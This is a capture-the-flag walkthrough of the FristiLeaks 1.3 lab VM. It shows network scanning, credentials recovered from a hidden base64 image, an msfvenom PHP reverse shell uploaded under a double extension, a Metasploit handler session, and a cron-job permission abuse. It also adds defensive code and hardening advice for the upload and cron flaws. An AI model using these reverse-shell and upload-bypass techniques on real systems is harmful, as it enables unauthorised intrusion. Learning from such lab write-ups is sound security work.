FristiLeaks: 1.3 Walkthrough

FristiLeaks is a boot-to-root virtual machine hosted on Vulnhub.

Description of the challenge
About:
Name: Fristileaks 1.3
Author: Ar0xA
Series: Fristileaks
Style: Enumeration/Follow the breadcrumbs
Goal: get root (uid 0) and read the flag file
Tester(s): dqi, barrebas
Difficulty: Basic
Description:
A small VM made for a Dutch informal hacker meetup called Fristileaks. Meant to be broken in a few hours without requiring debuggers, reverse engineering, etc.
VMware users will need to manually edit the VM's MAC address to: 08:00:27:A5:A6:76

Identify the IP address of the FristiLeaks machine
Nmap ping scan. The VM is the host whose MAC address is the 08:00:27:A5:A6:76 given in the description, which is how to pick it out of a busy LAN.

root@kali:~# nmap -sn 192.168.1.1/24
Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-19 14:54 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0032s latency).
MAC Address: A0:63:91:F0:CC:4B (Netgear)
Nmap scan report for 192.168.1.2
Host is up (0.052s latency).
MAC Address: 70:70:0D:C9:AD:78 (Apple)
Nmap scan report for 192.168.1.4
Host is up (0.28s latency).
MAC Address: B4:4B:D2:8C:6F:38 (Apple)
Nmap scan report for 192.168.1.5
Host is up (0.052s latency).
MAC Address: 08:6D:41:BA:BD:EC (Apple)
Nmap scan report for 192.168.1.7
Host is up (0.054s latency).
MAC Address: 70:77:81:C0:6C:33 (Hon Hai Precision Ind.)
Nmap scan report for 192.168.1.8
Host is up (0.054s latency).
MAC Address: 68:07:15:7A:EC:52 (Intel Corporate)
Nmap scan report for 192.168.1.9
Host is up (0.13s latency).
MAC Address: 54:EA:A8:7A:43:03 (Apple)
Nmap scan report for 192.168.1.11
Host is up (0.00025s latency).
MAC Address: F4:0F:24:33:5E:D1 (Apple)
Nmap scan report for 192.168.1.13
Host is up (0.049s latency).
MAC Address: 68:37:E9:88:16:5F (Amazon Technologies)
Nmap scan report for 192.168.1.43
Host is up (0.00083s latency).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.1.34
Host is up.
Nmap done: 256 IP addresses (11 hosts up) scanned in 27.63 seconds
root@kali:~#

Identify services running on FristiLeaks

root@kali:~# nmap -sT -sV -A -O -v -p 1-65535 192.168.1.43
Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-19 14:56 EDT
NSE: Loaded 143 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:56
Completed NSE at 14:56, 0.00s elapsed
Initiating NSE at 14:56
Completed NSE at 14:56, 0.00s elapsed
Initiating ARP Ping Scan at 14:56
Scanning 192.168.1.43 [1 port]
Completed ARP Ping Scan at 14:56, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:56
Completed Parallel DNS resolution of 1 host. at 14:56, 0.01s elapsed
Initiating Connect Scan at 14:56
Scanning 192.168.1.43 [65535 ports]
Discovered open port 80/tcp on 192.168.1.43
Connect Scan Timing: About 0.64% done
Connect Scan Timing: About 1.42% done; ETC: 16:07 (1:10:35 remaining)
Connect Scan Timing: About 2.29% done; ETC: 16:02 (1:04:34 remaining)
Connect Scan Timing: About 3.25% done; ETC: 15:58 (0:59:57 remaining)
Connect Scan Timing: About 4.26% done; ETC: 15:55 (0:56:35 remaining)
Connect Scan Timing: About 5.44% done; ETC: 15:52 (0:53:21 remaining)
Connect Scan Timing: About 6.80% done; ETC: 15:49 (0:50:14 remaining)
Connect Scan Timing: About 8.26% done; ETC: 15:47 (0:47:23 remaining)
Connect Scan Timing: About 9.73% done; ETC: 15:45 (0:44:40 remaining)
Connect Scan Timing: About 11.39% done; ETC: 15:42 (0:41:21 remaining)
Connect Scan Timing: About 13.19% done; ETC: 15:40 (0:38:56 remaining)
Connect Scan Timing: About 14.89% done; ETC: 15:39 (0:36:41 remaining)
Connect Scan Timing: About 17.11% done; ETC: 15:37 (0:34:29 remaining)
Connect Scan Timing: About 19.49% done; ETC: 15:36 (0:32:18 remaining)
Connect Scan Timing: About 21.99% done; ETC: 15:34 (0:30:13 remaining)
Connect Scan Timing: About 25.81% done; ETC: 15:34 (0:28:13 remaining)
Connect Scan Timing: About 28.63% done; ETC: 15:32 (0:26:05 remaining)
Connect Scan Timing: About 53.81% done; ETC: 15:16 (0:09:25 remaining)
Completed Connect Scan at 15:07, 688.20s elapsed (65535 total ports)
Initiating Service scan at 15:07
Scanning 1 service on 192.168.1.43
Completed Service scan at 15:07, 6.01s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 192.168.1.43
Retrying OS detection (try #2) against 192.168.1.43
adjust_timeouts2: packet supposedly had rtt of -594308 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -594308 microseconds. Ignoring time.
NSE: Script scanning 192.168.1.43.
Initiating NSE at 15:07
Completed NSE at 15:07, 0.12s elapsed
Initiating NSE at 15:07
Completed NSE at 15:07, 0.00s elapsed
Nmap scan report for 192.168.1.43
Host is up (0.00058s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods:
| Supported Methods: GET HEAD POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc
Running (JUST GUESSING): Linux 2.6.X|3.X (90%), Synology DiskStation Manager 5.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1
Aggressive OS guesses: Linux 2.6.32 (90%), Linux 2.6.32 or 3.10 (87%), Linux 2.6.32 - 3.10 (85%), Linux 2.6.32 - 3.13 (85%), Synology DiskStation Manager 5.1 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.015 days (since Fri May 19 14:45:37 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=240 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE
HOP RTT ADDRESS
1 0.58 ms 192.168.1.43
NSE: Script Post-scanning.
Initiating NSE at 15:07
Completed NSE at 15:07, 0.00s elapsed
Initiating NSE at 15:07
Completed NSE at 15:07, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 700.83 seconds
Raw packets sent: 112 (9.108KB) | Rcvd: 2541 (344.776KB)
root@kali:~#

Only 80/tcp is open (Apache 2.2.15 with PHP 5.3.3 on CentOS); TRACE is enabled but that is not a way in. Running nikto and dirb gives nothing interesting, so let's have a look at the three entries robots.txt disallows: /cola, /sisi and /beer.

All three directories serve nothing but a taunting image.

Cola, Sisi and Beer are all drinks, and the VM is called FristiLeaks, so the obvious next guess is /fristi. It exists and serves a login page.

The page source is more interesting:

<meta name="description" content="super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it."> <!--  TODO: We need to clean this up for production. I left some junk in here to make testing easier.  - by eezeepz -->
<!-- iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0klS0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+fm63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJZv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvbDpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNdjJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg104VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLqi1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2FgtOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HKul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12qmD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFheEPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJRU5ErkJggg==-->

The second comment is a bare base64 blob. Decoding it gives data that starts with the PNG signature, so save the blob to a file and redirect the decoded output into an image file:

root@kali:~# cat encoded.txt | base64 --decode > out.png
root@kali:~# file out.png
out.png: PNG image data, 365 x 75, 8-bit/color RGB, non-interlaced
root@kali:~#
The decoded image contains the string keKkeKKeKKeKkEkkEk, and the HTML comment was signed by eezeepz. That pair logs us in at http://192.168.1.43/fristi/:
Username : eezeepz
Password : keKkeKKeKKeKkEkkEk
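The same extraction done programmatically, as an added example that is not part of the original walkthrough: it scans page source for HTML comments that hold a bare base64 blob, decodes them and identifies the image type from its magic bytes instead of trusting the author's hint in the meta tag. SAMPLE_HTML is constructed here (a PNG signature plus filler bytes, not the real banner from the page), and the function names are my own.

```python
import base64
import binascii
import re

# Constructed sample: an HTML fragment with a base64 blob hidden in a comment,
# the way the /fristi login page does it. The payload is only the 8-byte PNG
# signature followed by filler, not the real image from the page.
SAMPLE_HTML = (
    '<meta name="description" content="super leet password login-test page">\n'
    '<!--  TODO: We need to clean this up for production.  - by eezeepz -->\n'
    '<!-- ' + base64.b64encode(b"\x89PNG\r\n\x1a\n" + b"\x00" * 16).decode() + ' -->\n'
)

COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)

# Magic bytes -> type, for the image formats a page like this is likely to embed.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def looks_like_base64(text: str) -> bool:
    """Cheap filter so ordinary comment text is never fed to the decoder."""
    s = "".join(text.split())
    return len(s) >= 16 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s) is not None


def sniff(blob: bytes):
    """Return the image type implied by the leading bytes, or None."""
    for magic, kind in MAGIC.items():
        if blob.startswith(magic):
            return kind
    return None


def extract_hidden_images(html: str):
    """Return (type, bytes) for every base64 blob found inside an HTML comment."""
    found = []
    for comment in COMMENT_RE.findall(html):
        body = "".join(comment.split())          # the blob may be line-wrapped
        if not looks_like_base64(body):
            continue
        try:
            blob = base64.b64decode(body, validate=True)
        except binascii.Error:
            continue
        found.append((sniff(blob), blob))
    return found


if __name__ == "__main__":
    for i, (kind, blob) in enumerate(extract_hidden_images(SAMPLE_HTML)):
        name = f"hidden_{i}.{kind or 'bin'}"
        with open(name, "wb") as f:
            f.write(blob)
        print(f"wrote {name} ({len(blob)} bytes, type={kind})")
```

Run it against a saved copy of the real page (`curl -s http://192.168.1.43/fristi/ > page.html` and read that instead of SAMPLE_HTML) and it writes every embedded image out with an extension taken from the bytes, not from the HTML. Blobs that decode to something other than a known image are still written as .bin, because a "picture" that is really text is exactly the kind of breadcrumb this VM hides.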

Logged in, we land on an upload form. Let's generate a PHP reverse shell with msfvenom:

root@kali:~/Desktop/B2R# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=4444 -f raw > shell.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 948 bytes
root@kali:~/Desktop/B2R#

The form rejects a plain .php upload: it compares the file's final extension against png/jpeg/gif, but it checks neither the content nor whether the name carries more than one extension. Apache's mod_mime treats every dot-separated suffix as an extension, and the CentOS PHP configuration registers a handler for .php, so a file named shell.php.png is still executed as PHP when it is requested. Rename the shell accordingly:

root@kali:~/Desktop/B2R# mv shell.php shell.php.png
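Why the rename works and how the form should have checked, as an added example (my code, not the VM's: do_upload.php is not reproduced on this page, so weak_check models the behaviour the walkthrough observed rather than the script's actual source). The stock CentOS 6 php.conf registers PHP with `AddHandler php5-script .php`, and because mod_mime treats every suffix of a name as an extension, shell.php.png reaches PHP however the form accepted it. The strict variant below rejects multi-extension names, checks the content's magic bytes against the declared type, and never reuses the client-supplied name on disk.

```python
import os
import re
import secrets

# Declared extension -> canonical type the content must match.
ALLOWED_EXT = {"png": "png", "jpg": "jpeg", "jpeg": "jpeg", "gif": "gif"}
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

# Constructed sample uploads (a minimal PNG header and a PHP one-liner).
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
PHP_BYTES = b"<?php system($_GET['c']); ?>"


def weak_check(filename: str) -> bool:
    """The kind of check the FristiLeaks form appears to make (assumed): only the
    final extension is compared with the allow-list, so shell.php.png passes."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED_EXT


def sniff(content: bytes):
    """Type implied by the leading bytes, or None."""
    for magic, kind in MAGIC.items():
        if content.startswith(magic):
            return kind
    return None


def strict_check(filename: str, content: bytes) -> bool:
    """Hardened form: exactly one extension, a tight character set for the stem,
    and the declared type must agree with the file's magic bytes."""
    name = os.path.basename(filename).lower()
    parts = name.split(".")
    if len(parts) != 2:                      # rejects shell.php.png, .htaccess, no extension
        return False
    stem, ext = parts
    if not re.fullmatch(r"[a-z0-9_-]{1,64}", stem) or ext not in ALLOWED_EXT:
        return False
    return sniff(content) == ALLOWED_EXT[ext]


def stored_name(content: bytes) -> str:
    """Never put the client's filename on disk: derive the extension from the
    content and pick a random name. Store it outside the web root, or in a
    directory where the PHP handler is disabled."""
    kind = sniff(content)
    if kind is None:
        raise ValueError("not an allowed image")
    return f"{secrets.token_hex(8)}.{kind}"


if __name__ == "__main__":
    for fname, data in (("shell.php.png", PHP_BYTES), ("photo.png", PNG_BYTES)):
        print(f"{fname:14} weak={weak_check(fname)!s:5} strict={strict_check(fname, data)}")
```

On the server side, anchor the handler to the last extension (`<FilesMatch "\.php$"> SetHandler php5-script </FilesMatch>` instead of `AddHandler php5-script .php`) and turn the interpreter off for the upload directory (`php_flag engine off` inside a `<Directory /var/www/html/fristi/uploads>` block), so a file that slips past the form is still served as static bytes.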

The file is accepted. Set up the handler before requesting the uploaded file (it lands in /fristi/uploads/, as the shell session below confirms):

msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > show options
Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
msf exploit(handler) > set LHOST 192.168.1.34
LHOST => 192.168.1.34
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.1.34:4444
[*] Starting the payload handler...
[*] Sending stage (33986 bytes) to 192.168.1.43
[*] Meterpreter session 1 opened (192.168.1.34:4444 -> 192.168.1.43:46399) at 2017-05-19 16:44:30 -0400
meterpreter > shell
Process 1844 created.
Channel 0 created.
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.1$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)

bash-4.1$ uname -a
uname -a
Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
bash-4.1$ file /bin/ls
file /bin/ls
/bin/ls: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, stripped

bash-4.1$ cat /etc/redhat-release
cat /etc/redhat-release
CentOS release 6.7 (Final)
bash-4.1$ ls -la
ls -la
total 16
drwxrwxrwx. 2 apache apache 4096 May 19 16:42 .
drwxr-xr-x 3 apache apache 4096 Nov 17 2015 ..
-r--r--r--. 1 apache apache 4 Nov 17 2015 index.html
-rw-r--r-- 1 apache apache 948 May 19 16:42 shell.php.png
bash-4.1$ pwd
pwd
/var/www/html/fristi/uploads

bash-4.1$ cd ../
cd ../
bash-4.1$ ls -la
ls -la
total 172
drwxr-xr-x 3 apache apache 4096 Nov 17 2015 .
drwxr-xr-x. 7 root root 4096 Nov 25 2015 ..
-rw-r--r--. 1 apache apache 1310 Nov 17 2015 checklogin.php
-rw-r--r--. 1 apache apache 1216 Nov 17 2015 do_upload.php
lrwxrwxrwx. 1 apache apache 14 Nov 17 2015 index.php -> main_login.php
-rw-r--r--. 1 apache apache 191 Nov 17 2015 login_success.php
-rw-r--r--. 1 apache apache 45 Nov 17 2015 logout.php
-rw-r--r--. 1 apache apache 1396 Nov 17 2015 main_login.php
-rw-r--r--. 1 apache apache 131736 Nov 17 2015 pic.b64
-rw-r--r--. 1 apache apache 1642 Nov 17 2015 pic2.b64
-rw-r--r--. 1 apache apache 372 Nov 17 2015 upload.php
drwxrwxrwx. 2 apache apache 4096 May 19 16:42 uploads
bash-4.1$ cd ..
cd ..
bash-4.1$ ls -la
ls -la
total 36
drwxr-xr-x. 7 root root 4096 Nov 25 2015 .
drwxr-xr-x. 6 root root 4096 Nov 17 2015 ..
drwxr-xr-x 2 apache apache 4096 Nov 25 2015 beer
drwxr-xr-x 2 apache apache 4096 Nov 25 2015 cola
drwxr-xr-x 3 apache apache 4096 Nov 17 2015 fristi
drwxr-xr-x 2 apache apache 4096 Nov 25 2015 images
-rw-r--r-- 1 apache apache 703 Nov 17 2015 index.html
-rw-r--r-- 1 apache apache 62 Nov 17 2015 robots.txt
drwxr-xr-x 2 apache apache 4096 Nov 25 2015 sisi
bash-4.1$ cd ..
cd ..
bash-4.1$ ls -la
ls -la
total 28
drwxr-xr-x. 6 root root 4096 Nov 17 2015 .
drwxr-xr-x. 19 root root 4096 Nov 19 2015 ..
drwxr-xr-x. 2 root root 4096 Aug 24 2015 cgi-bin
drwxr-xr-x. 3 root root 4096 Nov 17 2015 error
drwxr-xr-x. 7 root root 4096 Nov 25 2015 html
drwxr-xr-x. 3 root root 4096 Nov 17 2015 icons
-rw-r--r-- 1 root root 98 Nov 17 2015 notes.txt
bash-4.1$ cat notes.txt
cat notes.txt
hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.
-jerry
bash-4.1$ pwd
pwd
/var/www
bash-4.1$

Let's look at eezeepz's home directory. It is world-readable (drwx---r-x), which is why the apache account can list it:

bash-4.1$ cd /home
cd /home
bash-4.1$ ls -la
ls -la
total 28
drwxr-xr-x. 5 root root 4096 Nov 19 2015 .
dr-xr-xr-x. 22 root root 4096 May 19 14:49 ..
drwx------. 2 admin admin 4096 Nov 19 2015 admin
drwx---r-x. 5 eezeepz eezeepz 12288 Nov 18 2015 eezeepz
drwx------ 2 fristigod fristigod 4096 Nov 19 2015 fristigod
bash-4.1$ cd eezeepz
cd eezeepz
bash-4.1$ ls -la
ls -la
total 2608
drwx---r-x. 5 eezeepz eezeepz 12288 Nov 18 2015 .
drwxr-xr-x. 5 root root 4096 Nov 19 2015 ..
drwxrwxr-x. 2 eezeepz eezeepz 4096 Nov 17 2015 .Old
-rw-r--r--. 1 eezeepz eezeepz 18 Sep 22 2015 .bash_logout
-rw-r--r--. 1 eezeepz eezeepz 176 Sep 22 2015 .bash_profile
-rw-r--r--. 1 eezeepz eezeepz 124 Sep 22 2015 .bashrc
drwxrwxr-x. 2 eezeepz eezeepz 4096 Nov 17 2015 .gnome
drwxrwxr-x. 2 eezeepz eezeepz 4096 Nov 17 2015 .settings
-rwxr-xr-x. 1 eezeepz eezeepz 24376 Nov 17 2015 MAKEDEV
-rwxr-xr-x. 1 eezeepz eezeepz 33559 Nov 17 2015 cbq
-rwxr-xr-x. 1 eezeepz eezeepz 6976 Nov 17 2015 cciss_id
-rwxr-xr-x. 1 eezeepz eezeepz 56720 Nov 17 2015 cfdisk
-rwxr-xr-x. 1 eezeepz eezeepz 25072 Nov 17 2015 chcpu
-rwxr-xr-x. 1 eezeepz eezeepz 52936 Nov 17 2015 chgrp
-rwxr-xr-x. 1 eezeepz eezeepz 31800 Nov 17 2015 chkconfig
-rwxr-xr-x. 1 eezeepz eezeepz 48712 Nov 17 2015 chmod
-rwxr-xr-x. 1 eezeepz eezeepz 53640 Nov 17 2015 chown
-rwxr-xr-x. 1 eezeepz eezeepz 44528 Nov 17 2015 clock
-rwxr-xr-x. 1 eezeepz eezeepz 4808 Nov 17 2015 consoletype
-rwxr-xr-x. 1 eezeepz eezeepz 129992 Nov 17 2015 cpio
-rwxr-xr-x. 1 eezeepz eezeepz 38608 Nov 17 2015 cryptsetup
-rwxr-xr-x. 1 eezeepz eezeepz 5344 Nov 17 2015 ctrlaltdel
-rwxr-xr-x. 1 eezeepz eezeepz 41704 Nov 17 2015 cut
-rwxr-xr-x. 1 eezeepz eezeepz 14832 Nov 17 2015 halt
-rwxr-xr-x. 1 eezeepz eezeepz 13712 Nov 17 2015 hostname
-rwxr-xr-x. 1 eezeepz eezeepz 44528 Nov 17 2015 hwclock
-rwxr-xr-x. 1 eezeepz eezeepz 7920 Nov 17 2015 kbd_mode
-rwxr-xr-x. 1 eezeepz eezeepz 11576 Nov 17 2015 kill
-rwxr-xr-x. 1 eezeepz eezeepz 16472 Nov 17 2015 killall5
-rwxr-xr-x. 1 eezeepz eezeepz 32928 Nov 17 2015 kpartx
-rwxr-xr-x. 1 eezeepz eezeepz 11464 Nov 17 2015 nameif
-rwxr-xr-x. 1 eezeepz eezeepz 171784 Nov 17 2015 nano
-rwxr-xr-x. 1 eezeepz eezeepz 5512 Nov 17 2015 netreport
-rwxr-xr-x. 1 eezeepz eezeepz 123360 Nov 17 2015 netstat
-rwxr-xr-x. 1 eezeepz eezeepz 13892 Nov 17 2015 new-kernel-pkg
-rwxr-xr-x. 1 eezeepz eezeepz 25208 Nov 17 2015 nice
-rwxr-xr-x. 1 eezeepz eezeepz 13712 Nov 17 2015 nisdomainname
-rwxr-xr-x. 1 eezeepz eezeepz 4736 Nov 17 2015 nologin
-r--r--r--. 1 eezeepz eezeepz 514 Nov 18 2015 notes.txt
-rwxr-xr-x. 1 eezeepz eezeepz 390616 Nov 17 2015 tar
-rwxr-xr-x. 1 eezeepz eezeepz 11352 Nov 17 2015 taskset
-rwxr-xr-x. 1 eezeepz eezeepz 249000 Nov 17 2015 tc
-rwxr-xr-x. 1 eezeepz eezeepz 51536 Nov 17 2015 telinit
-rwxr-xr-x. 1 eezeepz eezeepz 47928 Nov 17 2015 touch
-rwxr-xr-x. 1 eezeepz eezeepz 11440 Nov 17 2015 tracepath
-rwxr-xr-x. 1 eezeepz eezeepz 12304 Nov 17 2015 tracepath6
-rwxr-xr-x. 1 eezeepz eezeepz 21112 Nov 17 2015 true
-rwxr-xr-x. 1 eezeepz eezeepz 35608 Nov 17 2015 tune2fs
-rwxr-xr-x. 1 eezeepz eezeepz 15410 Nov 17 2015 weak-modules
-rwxr-xr-x. 1 eezeepz eezeepz 12216 Nov 17 2015 wipefs
-rwxr-xr-x. 1 eezeepz eezeepz 504400 Nov 17 2015 xfs_repair
-rwxr-xr-x. 1 eezeepz eezeepz 13712 Nov 17 2015 ypdomainname
-rwxr-xr-x. 1 eezeepz eezeepz 62 Nov 17 2015 zcat
-rwxr-xr-x. 1 eezeepz eezeepz 47520 Nov 17 2015 zic
bash-4.1$ cat notes.txt
cat notes.txt
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called "runthis" in /tmp/, each line one command. The output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
- Jerry
bash-4.1$
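A reconstruction of the runner Jerry describes, added here as an example; the walkthrough never prints /home/admin/cronjob.py, so the rules below are assumed from the note rather than taken from the VM. It shows the weakness the next step exploits: the allow-list is on where a binary lives, not on what it does, so once chmod sits in an allowed directory the job will rewrite the permissions of anything the admin account owns. And because the trigger file lives in world-writable /tmp, any local account can feed it, not only eezeepz.

```python
import os
import shlex
import subprocess

# Reconstruction of the runner Jerry's note describes; the VM's real
# /home/admin/cronjob.py is not shown on this page, so these rules are assumed.
ALLOWED_DIRS = ("/usr/bin", "/home/admin")
RUNTHIS = "/tmp/runthis"
CRONRESULT = "/tmp/cronresult"

# Constructed input: the line the walkthrough writes, plus two that must be refused.
SAMPLE_RUNTHIS = """\
/home/admin/chmod -R 777 /home/admin/
/bin/bash -c 'id'
/usr/bin/../../bin/sh -c 'id'
"""


def allowed_command(line: str):
    """Return argv if the binary lives in an allowed directory, else None.

    The path is normalised lexically so '/usr/bin/../../bin/sh' is not accepted
    on the strength of its '/usr/bin/' prefix. A production runner should also
    os.path.realpath() it, since a symlink inside an allowed directory defeats a
    purely lexical check."""
    try:
        argv = shlex.split(line, comments=True)
    except ValueError:
        return None
    if not argv or not os.path.isabs(argv[0]):
        return None
    binary = os.path.normpath(argv[0])
    if os.path.dirname(binary) not in ALLOWED_DIRS:
        return None
    return [binary] + argv[1:]


def execute(lines):
    """Run each allowed line; return one result string per non-empty input line."""
    results = []
    for line in lines:
        if not line.strip():
            continue
        argv = allowed_command(line)
        if argv is None:
            results.append(f"refused: {line.strip()}")
            continue
        try:
            p = subprocess.run(argv, capture_output=True, text=True, timeout=30)
            results.append(p.stdout + p.stderr)
        except OSError as e:              # binary missing or not executable
            results.append(f"failed: {argv[0]}: {e}")
    return results


def main():
    with open(RUNTHIS) as f:
        results = execute(f)
    with open(CRONRESULT, "w") as f:
        f.write("\n".join(results) + "\n")


if __name__ == "__main__":
    main()
```

Even with the traversal and symlink checks in place, the design is unsafe as long as a general-purpose tool such as chmod is inside the allowed directories: the fix is an allow-list of specific commands with fixed arguments, and a trigger file that only the intended user can write.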

The job runs with admin's privileges, and admin's own copy of chmod is on the allow-list, so we can make admin loosen the permissions on its home directory. /tmp/runthis is writable by anyone, so the apache account we hold is enough. Write the command, wait a minute for the cron job to fire, then check /tmp for cronresult:

bash-4.1$ echo "/home/admin/chmod -R 777 /home/admin/" > /tmp/runthis
bash-4.1$ cd /tmp
bash-4.1$ ls
cronresult runthis
bash-4.1$ cd /home/admin
bash-4.1$ ls -la
total 652
drwxrwxrwx. 2 admin admin 4096 Nov 19 2015 .
drwxr-xr-x. 5 root root 4096 Nov 19 2015 ..
-rwxrwxrwx. 1 admin admin 18 Sep 22 2015 .bash_logout
-rwxrwxrwx. 1 admin admin 176 Sep 22 2015 .bash_profile
-rwxrwxrwx. 1 admin admin 124 Sep 22 2015 .bashrc
-rwxrwxrwx 1 admin admin 45224 Nov 18 2015 cat
-rwxrwxrwx 1 admin admin 48712 Nov 18 2015 chmod
-rwxrwxrwx 1 admin admin 737 Nov 18 2015 cronjob.py
-rwxrwxrwx 1 admin admin 21 Nov 18 2015 cryptedpass.txt
-rwxrwxrwx 1 admin admin 258 Nov 18 2015 cryptpass.py
-rwxrwxrwx 1 admin admin 90544 Nov 18 2015 df
-rwxrwxrwx 1 admin admin 24136 Nov 18 2015 echo
-rwxrwxrwx 1 admin admin 163600 Nov 18 2015 egrep
-rwxrwxrwx 1 admin admin 163600 Nov 18 2015 grep
-rwxrwxrwx 1 admin admin 85304 Nov 18 2015 ps
-rw-r--r-- 1 fristigod fristigod 25 Nov 19 2015 whoisyourgodnow.txt
bash-4.1$ cat whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG

bash-4.1$ cat cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq

